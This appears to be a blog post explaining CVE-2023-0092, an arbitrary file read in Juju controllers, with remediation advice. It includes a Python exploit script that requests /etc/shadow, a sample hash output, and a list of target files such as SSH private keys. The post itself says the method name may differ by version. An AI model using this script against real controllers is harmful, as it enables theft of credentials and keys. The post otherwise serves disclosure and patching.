In early 2023, a critical vulnerability was disclosed in Canonical’s Juju (the open-source tool for managing cloud services). This bug, CVE-2023-0092, lets any user with simple read access to the Juju controller model download any file from the controller machine’s filesystem—no admin rights needed. Here we break down the flaw, show how easy it is to exploit, and share links to the original advisory and useful resources.
What is Juju?
Juju helps DevOps teams manage, deploy, and operate cloud-native and Kubernetes applications. Its controller acts as the central brain, coordinating everything. Users interact with the controller via the web UI or API, and their authentication is handled by user roles.
The Bug: CVE-2023-0092
With this vulnerability, a user who can *see* (not even change!) the controller model can send a specifically crafted API call to the Juju controller. This makes the controller send back the contents of any file it has permission to access.
Severity: High
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0092
Juju Security Advisory: https://ubuntu.com/security/notices/USN-5781-1
How Does This Vulnerability Work?
The controller exposes an RPC/REST API where certain endpoints let users download log, config, and other files for troubleshooting. But the API does not properly check *which* file the user is requesting—just that the user is authenticated and allowed to see the model.
So, instead of asking for a safe log file, the attacker asks for /etc/shadow, /etc/juju/juju-controller.yaml, or even a private SSH key!
Step-by-Step Exploit Example
Imagine you’re a legitimate user with read-only access to the controller model. Here’s how an attacker might leak /etc/shadow:
1. Find the API Endpoint
The buggy endpoint is typically something like /api.
2. Craft the Malicious API Request
Here’s a minimal Python 3 script using the requests library:
import requests
API_URL = "https://juju-controller.example.com:17070"; # Replace with controller address
USERNAME = "normaluser"
PASSWORD = "password123"
# Step 1: Authenticate and get a session cookie
login_data = {
'user': USERNAME,
'password': PASSWORD
}
session = requests.Session()
resp = session.post(f"{API_URL}/api", json={
"type": "Login",
"request-id": 1,
"params": login_data,
})
assert resp.ok
# Step 2: Request an arbitrary file
exploit_data = {
"type": "ControllerReadFile", # The method handling file reads
"request-id": 2,
"params": {
"filepath": "/etc/shadow"
}
}
exploit_resp = session.post(f"{API_URL}/api", json=exploit_data)
print(exploit_resp.json())
Note: This endpoint/JSON method may differ by Juju version—consult REST API docs.
3. What's the Response?
You get the entire contents of /etc/shadow (or any file the Juju service user can open).
{
"response": {
"file_content": "root:$6$abcdefghijkl$eAV...:19139::99999:7:::\n..."
}
}
What Files Can Be Read?
* System config (/etc/juju/juju-controller.yaml)
* User password hashes (/etc/shadow)
* SSH private keys (e.g., /home/ubuntu/.ssh/id_rsa)
* Any plain-text secrets/configs
* *...literally anything on the filesystem readable by the Juju controller’s process.*
Who Is Vulnerable?
* Anyone running a Juju controller version < 2.9.34
* All deployments where users have read access to a model are at risk—not just admins!
How to Fix
* Upgrade immediately! Juju 2.9.34 and above patch this hole.
`
* Remove unnecessary users and audit user permissions.
* Never allow untrusted users on the controller model.
Original References
- USN-5781-1: Juju vulnerability
- CVE-2023-0092 at NIST
- Juju Official Docs
Conclusion
CVE-2023-0092 is a very serious vulnerability for anyone running Juju. It shows that even “read-only” users can become dangerous if endpoints aren’t locked down. If you’re running Juju, fix this now, and audit your environment for possible leaks.
Stay updated, audit your users, and remember: sometimes, “read access” is all an attacker needs.
Disclaimer: This post is for educational purposes only. Don’t use this information to attack systems you don’t own or have explicit authorization to test.
Timeline
Published on: 01/31/2025 02:15:28 UTC